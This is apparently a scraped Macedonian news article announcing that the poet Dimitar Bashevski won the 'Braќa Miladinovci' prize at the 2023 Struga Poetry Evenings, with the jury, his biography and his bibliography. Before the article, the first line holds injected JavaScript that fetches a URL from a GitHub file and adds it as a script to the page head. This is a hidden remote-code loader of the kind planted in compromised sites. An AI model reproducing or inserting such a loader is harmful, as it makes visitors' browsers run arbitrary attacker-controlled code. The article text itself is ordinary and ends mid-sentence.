;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Димитар Башевски за збирката песни „ Дни, години“ е добитник на наградата „Браќа Миладиновци“ на Струшките вечери на поезијата 2023 - Антропол
АктуелноЛокалноНастани

Димитар Башевски за збирката песни „ Дни, години“ е добитник на наградата „Браќа Миладиновци“ на Струшките вечери на поезијата 2023

Познатиот македонски поет, романсиер, книжевен преведувач и издавач Димитар Башевски е добитник на наградата „Браќа Миладиновци“ што се доделува од страна на Струшките вечери на поезијата  за најдобра поетска збирка помеѓу две фестивалски изданија. Башевски е добитник на наградата за неговата поетска збирка „Дни, години“ во издание на СЛОВО.  

Добитникот на наградата беше соопштен  на прес-конференцијата, одржана на 31.07.2023 година, во 11:30 ч. во  Конгресната Сала во Хотел Дрим во Струга. Жири комисијата во состав: Веле Смилевски (претседател), Милован Стефановски Славица Гаџова Свидерска, Трајче Стамески, Марина Мијаковска (секретар)       после прочитот на сите 35 пристигнати книги направи заедничка селекција и во потесен круг од пет книги влегоа збирките (редоследот е според почетните букви од презимињата на авторите).

Димитар Башевски, романсиер, раскажувач, поет, преведувач, издавач. Роден во 1943  година во с. Ѓавато, Битолско. Завршил Филозофски факултет на Универзитетот „Св. Кирил и Методија“ во Скопје. Повеќе години работел како новинар, постојан дописник од Атина и уредник, а потоа како издавач. Бил директор и главен уредник на издавачката куќа „Култура“ и потоа главен уредник на издавачката куќа „Слово“. Од 2000 до 2006 година беше претседател, а потоа почесен претседател на Македонскиот ПЕН центар.

Башевски е автор на следните дела:

Туѓинец, роман, 1969; Враќање, роман, 1974; Нема смрт додека ѕвони, роман, 1980; Една година од животот на Иван Плевнеш, роман, 1985; Куќата на животот, поезија, 1987; Сарајановскиот каранфил, роман, 1990; Дневникот на Ања, роман за деца, 1994; Привремен престој, поезија, 1995; Братот, роман, 2007; Совладано време, поезија, 1998; Бунар, роман, 2001; Аголен камен, поезија, 2005; Братот, роман, 2007; Во дланката своја си гледам, поезија, 2010; Прозорци, роман, 2010; Белег, сон, избор поезија, 2010; Прозорци, роман, нова верзија, 2013; Мајсторот, раскази, 2013; Скршнувања, поезија, 2016; Круг, роман, 2017; Избрани дела во шест тома, 2018; Писма од карантин, есеи, 2021; Дни, години, поезија, 2023.

Негови книги се преведувани и објавувани на англиски, чешки, грчки, романски, српски, турски, бугарски, црногорски и албански јазик.

Избори од неговата поезија се објавени на англиски јазик во Лондон, на грчки јазик во Атина, на романски јазик во Букурешт и на српскијазик во Белград.

Застапуван во поголем број антологии на македонската литературa во земјата и во странство и во македонските енциклопедии. За своите книги, тој ги има добиено наградите „11 Октомври“, „Рациново признание“, „13 Ноември“, „Ванчо Николески“, наградата Роман на годината (“Утрински весник”) за романот “Бунар”, како и државната награда за долгогодишни остварувања „Св. Климент Охридски“. Романот „Бунар“ во 2002 година беше номиниран за меѓународната награда „Балканика”, додека книгата раскази „Мајсторот“, беше во најтесниот избор за меѓународната „Његошева награда“ за 2015 година.

 Преостанатите четворица кандидати во потесен избор исто така, според вообичаената пракса, ќе бидат дел од програмата на фестивалот.

Струшките вечери на поезијата оваа година ќе се одржат од 24 до 28 август во своето редовно издание на препознатливите локации